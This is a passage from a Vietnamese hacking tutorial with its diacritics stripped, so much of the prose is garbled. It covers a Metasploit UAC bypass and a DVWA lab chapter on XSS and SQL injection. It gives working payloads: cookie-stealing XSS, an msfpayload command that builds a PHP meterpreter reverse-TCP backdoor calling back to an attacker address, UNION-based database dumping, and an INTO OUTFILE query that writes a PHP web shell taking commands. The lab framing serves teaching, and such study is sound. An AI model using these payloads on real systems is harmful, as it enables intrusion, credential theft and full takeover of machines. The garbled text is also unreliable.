Ta c 1 phin lm vic vn cha iu khin ton quyn c. thc hin
ta cn thc hin lnh: run post/windows/escalate/bypassuac
-
85
Chng ta c th xem tt c cc lnh h tr bng lnh: help
3. Cch phng chng
Rt tic l cho n thi im hin ti, Microsoft vn cha xc nhn li trong
UAC cng nh cung cp bn v cho l hng bo mt ny. Mt pht ngn vin ca
Microsoft khng nh khng c l hng vo trong UAC c. V th, chng ta cn ci t
phn mm dit virus, backdoor c uy tnh trn th trng trnh b li dng.
-
86
Chng 7: WEB HACKING VI DVWA
I. Gii thiu i vi nhng chng ta mi nghin cu hacking, mi trng th nghim l rt
quan trng, tuy nhin tm c mi trng thc t, ph hp vi trnh li khng n
gin.
Ngc li, i vi nhng ngi c trnh v kinh nghim hacking, chc hn
cc chng ta cng c nhu cu th nghim trnh hacking ca mnh n u cng nh
nng cao thm kh nng bn thn.
Vy th DVWA- Damn Vulnerable Web Application c th p ng nhu cu
ca c nhng ngi mi vo cng nh nhng ngi c trnh nht nh. DVWA
l mt framework xy dng sn nhng l hng bo mt theo top 10 im yu bo
mt Web ca OWASP. Trnh t mc low n high c th p ng nhu cu hack ca
rt nhiu ngi.
Vy DVWA l mt ng dng web PHP / MySQL b li. Mc tiu chnh ca n
l gip cho cc chuyn gia an ninh kim tra k nng v cng c ca h trong mt mi
trng hp php, gip cc nh pht trin web hiu r hn v cc qu trnh m bo cc
ng dng web v h tr gio vin / hc sinh ging dy / hc bo mt ng dng web
trong mt mi trng lp hc.
II. Hng dn ci t DVWA trn Backtrack Do y l framework trn nn php nn n gin cc chng ta dng
webserver bng XAMPP trc, ri copy DVWA vo, chng ta s s dng DVWA trn
giao din web.
1. Ti v ci t XAMPP V y l phn mm m ngun m, nn cc chng ta hy vo trang ch ca
XAMPP http://www.apachefriends.org/en/xampp.html ti phin bn mi nht v
my.
-
87
Sau khi download XAMPP v, cc chng ta vo Terminal v g lnh nh
hnh bn di
Khi ng XAMPP ln
-
88
Sau cng l m trnh duyt web ln v g http://localhost ta s c giao din
chnh ca XAMPP nh hnh bn di:
2. Ti v ci t DVWA Cc chng ta vo link http://www.dvwa.co.uk/ ti DVWA v my
-
89
Sau tin hnh gii nn file va download v v t vo th mc
/opt/lampp/htdocs/
Vo trnh duyt web v g http://localhost/dvwa/ ta c giao din chnh ca
DVWA nh sau :
-
90
Ch :
Phi bt XAMPP ln trc th mi c th chy DVWA.
Ti giao din ng nhp ca DVWA, cc chng ta ng nhp bng acc/pass mc nh l admin/password.
Chun b trc khi tn cng:
M trnh duyt web, g: localhost/dvwa. C th s dng dia_chi_ip/dvwa
-
91
khai thc cc li trn DVWA(XSS, SQL Injection), chng ta phi thit lp
Security Level l Low. V khi , nhng on code c thm vo s c gi
nguyn. Vi mc High, s dng hm htmlspecialchars() chuyn cc k t c bit,
khng ging vi lc nhp ban u. mc Medium, chui s b xa i nn
khng bi nh hng. Tuy nhin, cc th html khc vn b nh hng bnh thng.
V th chng ta thit lp Security Level l low: Chn DVWA Security -> Low
-> Submit
-
92
III. Cc k thut tn cng trn DVWA
1. XSS (Cross-Site Scripting)
a) Gii thiu
Cross-Site Scripting hay cn c gi tt l XSS (thay v gi tt l CSS
trnh nhm ln vi CSS-Cascading Style Sheet ca HTML) l mt k thut tn cng
bng cch chn vo cc website ng (ASP, PHP, CGI, JSP ...) nhng th HTML hay
nhng on m script nguy him c th gy nguy hi cho nhng ngi s dng khc.
Trong , nhng on m nguy him c chn vo hu ht c vit bng cc
Client-Site Script nh JavaScript, JScript, DHTML v cng c th l c cc th
HTML.
XSS l mt trong nhng li ph bin, c rt nhiu trang web b mc phi li
ny, chnh v th ngy cng c nhiu ngi quan tm n li ny!
b) Phn loi XSS
XSS c th c phn loi nh sau:
Stored XSS Attacks
Stored XSS l hnh thc tn cng m cho php k tn cng c th chn
mt on script nguy him (thng l Javascript) vo website ca chng ta thng qua
mt chc nng no (vd: vit li bnh, guestbook, gi bi..), t khi cc thnh
vin khc truy cp website s b dnh m c t k tn cng ny, cc m c ny
thng c lu li trong database ca website chng ta nn gi l Stored. Stored XSS
pht sinh do chng ta khng lc d liu do thnh vin gi ln mt cch ng n,
khin cho m c c lu vo Database ca website.
-
93
Reflected XSS Attacks
Trong hnh thc ny, k tn cng thng gn thm on m c vo URL ca
website chng ta v gi n nn nhn, nu nn nhn truy cp URL th s b dnh m
c. iu ny xy ra do ta khng ch filter input t URL ca website mnh.
XSS Attack Consequences Phng php ny tng t nh 2 phng php trn. Tuy nhin, im khc bit
l cch m payload c a ti server. Mt site read only hay brochureware
cng c thn him XSS. XSS c th gy thit hi t mc nh n ln nh vic
chim ti khon ca ngi s dng. Mt cuc tn cng XSS c th ly c session
cookie, gy mt ti khon s dng. Hoc c th nh hng ti d liu ngi dng u
cui bng cch ci t Trojan, hoc redirect trang web ngi truy cp sang mt trang
khc, hoc thay i ni dung ca mt trang.
c) Tm hiu v hot ng XSS
V c bn, hot ng ca XSS c th c m t nh sau:
-
94
M t hot ng ca XSS
Theo nguyn tc trn, mt hacker c th li dng cc l hng bo mt t
mt website. Cc th HTML u c th l cng c cho cc cuc tn cng bi k thut
XSS, trong 2 th IMG v IFRAME c th cho php trnh duyt load thm cc
website khc khi cc lnh HTML c hin th. Li dng nguyn tc ny, cc hacker
c th chn cc on m c vo v khin my nn nhn b tn cng XSS
d) Tc hi ca XSS
XSS thng c s dng vi cc mc ch sau:
nh cp thng tin
Gip hacker c th truy cp c vo nhng thng tin nhy cm
Ly c quyn truy cp min ph vo nhng ni dung ng ra phi tr
tinmi c c
D xt s thch ca ngi s dng mng
Thay i din mo ( deface) mt trang web no
Tn cng t chi dch v (DoS)
M JavaScript c c th truy cp bt c thng tin no sau y:
- Cookie c nh (ca site b li XSS) c duy tr bi trnh duyt.
- RAM Cookie (ca site b li XSS).
- Tn ca tt c cc ca s c m t site b li XSS.
- Bt c thng tin m c th truy cp c t DOM hin ti (nh
value, m HTML).
-
95
e) Tn cng XSS
Thc hin script: alert(XSS); hin thng bo trn trnh
duyt web
Kt qu nhn c thay v ch lu vo c s d liu:
Xem cookie ca ngi dng:
alert(document.cookie);
-
96
Chng ta c th gi cookie ny v trc tip my tn cng thay v ch hin ln
mn hnh.
Chng ta c th chn cc th iframe vo:
Ngoi ra, chng ta c th s dng Metasploit Framework (gii thiu trn)
tn cng chim quyn iu khin cng vi backdoor cho php my tnh mc tiu kt
ni li. Code to backdoor:
Msfpayload php/meterperter/reverse_tcp lhost=192.168.10.102 lport=4444
R > forum.php
-
97
Dng msfconsole v thit lp cc thng s cn thit lng nghe kt ni trn
server:
Tr li XSS Stored, ta s dng script:
-
98
Windows.
Sau khi thc thi script trn xong, Metasploit Framework m kt ni n v
chng ta c th tn cng.
Mt s hnh nh tn cng:
-
99
-
100
f) Mt s phng php phng nga v ngn chn
Ngi ta khng lng ht c mc nguy him ca XSS nhng cng khng
qu kh khn ngn nga XSS. C rt nhiu cch c th gii quyt vn ny.
OWASP (The Open Web Application Standard Project) ni rng c th xy dng
cc website bo mt cao, i vi cc d liu ca ngi s dng, nn:
Ch chp nhn nhng d liu hp l.
T chi nhn cc d liu hng.
Lin tc kim tra v thanh lc d liu.
Nhng ngi pht trin web c th bo v website ca mnh khi b li dng
thng qua tn cng XSS, bng cch m bo nhng trang pht sinh ng khng cha
cc tag ca script bng cch lc v xc nhn hp l cc d liu u vo t pha ngi
dng hoc m ha(endcoding) v lc cc gi tr xut cho ngi dng.
2. SQL Injection
a) SQL Injection l g?
SQL Injection l mt trong nhng kiu hack web ang dn tr nn ph bin
hin nay. Bng cch inject cc m SQL query/command vo input trc khi chuyn
cho ng dng web x l, chng ta c th login m khng cn username v password,
remote execution, dump data v ly root ca SQL server. Cng c dng tn cng l
mt trnh duyt web bt k, chng hn nh Internet Explorer, Firefox, Google Chrome,
...
-
101
b) Cc bc khai thc l hng trang web
Vo trang http://localhost/dvwa/, chn SQL Injection (Blind):
Chng ta bt u khai thc li t nhp liu User ID:
Nhp vo: 1
Nu nhp vo:1 or 1=1hoc 1 or =#ta c kt qu rt bt ng
-
102
Du # c s dng loi b tc dng ca du () sau cng trong cu lnh
truy vn sql:
SELECT first_name, last_name FROM users WHERE user_id =
$user_id
Xem tn c d liu: a UNION select 1, database();#
Xem user v system user: a UNION select system_user(), user();#
-
103
Xc nh tn user m ngi dng ang s dng v phin bn ca MySQL
Xem tt c cc tn c s d liu cng cc bng c trong h qun tr csdl
MySQL:
a UNION select table_schema, table_name, from
information_schema.tables;#
Chng ta c th thm mnh iu kin WHERE gii hn li kt qu
a UNION select table_schema, table_name, from information_schema.tables
where table_schema=dvwa;#
-
104
Lit k cc column trong bng:
a UNION select table_name, column_name, from
information_schema.columns where table_schema=dvwa;#
Tip tc thc hin cu lnh sau:
' union select '','' into outfile C:\\xampp\\htdocs\\sqlinjection.php' ;#
Sau khi tao xong, chng ta ch cn thc hin lnh trn trnh duyt, pha sau chui
?cmd=cu lnh. V d: 192.168.10.20/sqlinjection.php?cmd=dirta c:
-
105
By gi ta c ton quyn iu khin my tnh ca victim.
a) Cc phng n phng chng SQL Injection
i password mc nh ca user root
Xo tt c cc th tc c mc nh lu tr trn server
Lc nhng k t c th gy hi nh ,,,:,# ngay t khi nhn yu cu truy vn t bn ngoi
Update SQL vi nhng bn mi nht
Kho cc t kha nhy cm i vi SQL bng cch dng firewall chn ngay t u vo
M ha password
Loi b nhng t kha SELECT, DELETE, INSERT, trong cu truy vn t bn ngoi.
-
106
TI LIU THAM KHO
[1] McGraw Hill Osborne,Media Hacking Exposed Sixth Edition Network
Security Secrets And SolutionsJan 2009
[2] Gordon Fyodor Lyon, Nmap Network Scanning: The Official Nmap
Project Guide to Network Discovery and Security Scanning
[3] www.wikipedia.org
[4] www.google.com.vn
Remote Desktop Protocolchuong 7: web hocking voi DVWA